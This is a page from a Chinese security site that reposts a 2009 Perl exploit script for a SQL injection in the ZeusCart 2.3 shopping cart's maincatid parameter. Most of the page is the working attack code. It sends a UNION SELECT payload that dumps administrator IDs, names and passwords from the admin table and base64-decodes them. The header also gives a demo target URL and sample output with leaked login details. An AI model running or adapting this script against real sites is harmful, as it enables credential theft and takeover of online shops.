首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZeusCart <= 2.3 (maincatid) SQL Injection Vulnerability
来源:br0ly[dot]Code[at]gmail[dot]com 作者:Br0ly 发布时间:2009-05-31  

#!usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
#
#| -Name: Zeus Cart V 2.3
#| -Site: http://www.zeuscart.com/
#| -Site Demo: http://www.zeuscart.com/onlinedemo.php?action=skip
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly[dot]Code[at]gmail[dot]com
#|
#| -Gretz: Osirys , xs86 , str0ke
#|
#| -p0c:
#| -SQL INJECTION:
#|
#| -9999+union+all+select+0--
#|
#| - Demo ONline:
#|
#| -> http://ajdemos.com/demo/zeuscart/v23/?do=featured&action=showmaincatlanding&maincatid=[SQL]
#|  
#|
#| -Exploit: Demo:
#|
#|perl zeuscart.txt http://ajdemos.com/demo/zeuscart/v23/
#|
#|  --------------------------------------
#|   -Zeus Cart V2.3                 
#|   -Sql Injection                     
#|   -by Br0ly                          
#|  --------------------------------------
#|
#|[+] Getting the login,pass
#|
#|[+] User   = demoadmin
#|[+] Pass   = demo123
#|
#|
#| ;D
#|

  use IO::Socket::INET;
  use LWP::UserAgent;
  use MIME::Base64;
 
   my $host    = $ARGV[0];
   my $sql_path = "/?do=featured&action=showmaincatlanding&maincatid=";
  
 
  if (@ARGV < 1) {
      &banner();
      &help("-1");
  }

  elsif(cheek($host) == 1) {
      &banner();
      &xploit($host,$sql_path);
  }
 
  else {
      &banner();
      help("-2");
  }
 
  sub xploit() {

      my $host     = $_[0];
      my $sql_path = $_[1];

      print "[+] Getting the login,pass\n\n";

      my $sql_atk = $host.$sql_path."-9999+union+all+select+concat(0x6272306c79,0x3a,admin_id,0x3a,admin_name,0x3a,admin_password,0x3a,0x6272306c79)+from+admin_table--";
      my $sql_get = get_url($sql_atk);
      my $connect = tag($sql_get);
    
      if($connect =~ /br0ly:(.+):(.+):(.+):br0ly/) {
  
    my $id   = $1;
    my $user = $2;
    my $pass = $3;

      if($id =~ /(.+):/) {
    
      my $id_2 = $1;
      }
    
    my $pass_aux =  base64_decode($pass);

    print "[+] User   = $user\n";
    print "[+] Pass   = $pass_aux\n";
  
    exit(0);
      }
      else {
    print "[-] Exploit, Fail\n";
    exit(0);
    
      }
 }

   sub get_url() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
  }

  sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
  }

  sub cheek() {
    my $host  = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
  }

  sub base64_decode () {
  
    my $str_1 = $_[0];
    my $str_decode = decode_base64($str_1);
    return $str_decode;
  }


  sub help() {

    my $error = $_[0];
    if ($error == -1) {
        print "\n[-] Error, missed some arguments !\n\n";
    }
  
    elsif ($error == -2) {

        print "\n[-] Error, Bad arguments !\n";
    }
 
    print "[*] Usage : perl $0 http://localhost/zeuscart/\n\n";
    print "    Ex:     perl $0 http://localhost/zeuscart/\n\n";
    exit(0);
  }

  sub banner {
    print "\n".
          "  --------------------------------------\n".
          "   -Zeus Cart V2.3                   \n".
          "   -Sql Injection                       \n".
          "   -by Br0ly                            \n".
          "  --------------------------------------\n\n";
  }


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ecshop 2.6.2 Multiple Remote C
·Roxio CinePlayer 3.2 (SonicMed
·MS Windows WebDav for IIS 6.0
·ICQ 6.5 URL Search Hook / ICQT
·COWON America jetCast 2.0.4.11
·EXPLOIT Online Grades & Attend
·Dokuwiki 2009-02-14 Remote/Tem
·RadCLASSIFIEDS Gold v2 (seller
·Joomla Component Com_Agora 3.0
·Roxio CinePlayer 3.2 (IAManage
·WebMember 1.0 (formID) Remote
·Unclassified NewsBoard 1.6.4 M
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved